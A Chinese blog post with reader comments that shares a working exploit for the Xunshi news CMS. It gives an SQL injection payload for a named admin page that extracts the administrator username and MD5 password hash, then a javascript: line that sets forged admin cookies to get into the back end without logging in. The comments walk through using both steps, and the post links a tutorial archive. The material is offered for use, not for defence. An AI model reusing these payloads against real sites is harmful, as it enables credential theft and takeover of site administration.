有人公布了,讯时漏洞问题真大 !!!!
/admin/admin_news_pl_view.asp?id=1 //id任意 填入以下语句
有时1显示错误信息的时候继续往后退2,3,4。。。。
|’+dfirst(“[user]“,”[admin]“)+chr(124)+dfirst(“[pass]“,”[admin]“),username=’
cookies进后台
javascript:alert(document.cookie=”adminuser=” + escape(“admin”));alert(document.cookie=”adminpass=” + escape(“480d6d6b4d57cc903f3bab877248da40″));
请问大牛: javascript:alert(document.cookie=”adminuser=” + escape(“admin”));alert(document.cookie=”adminpass=” + escape(“480d6d6b4d57cc903f3bab877248da40″));
到这一步怎么打? 直接在浏览器网址栏 没有效果啊?
先用|’+dfirst(“[user]“,”[admin]“)+chr(124)+dfirst(“[pass]“,”[admin]“),username=’ 这个语句得到网站的cookies,然后通过javascript:alert(document.cookie=”adminuser=” + escape(“admin”));alert(document.cookie=”adminpass=” + escape(“480d6d6b4d57cc903f3bab877248da40″));填上对应的用户名和密码md5值 就可以访问网站后台了。
|’+dfirst(“[user]“,”[admin]“)+chr(124)+dfirst(“[pass]“,”[admin]“),username=’ // 得到管理员用户和MD5密码
原来这句是得到管理员的密码的。
下面这个
javascript:alert(document.cookie=”adminuser=” + escape(“admin”));alert(document.cookie=”adminpass=” + escape(“480d6d6b4d57cc903f3bab877248da40″));
在哪里输入?
需要知道后台的管理地址吗?
恩 在登陆页面 在浏览器输入就行了,利用cookie进入后台。 我博客发布的双引号有问题,自己得改下 囧
你看教程吧 http://xiaoyi.us/luxiang/xunshinews0DAY.rar
@小毅: 非常的感谢。谢谢小毅。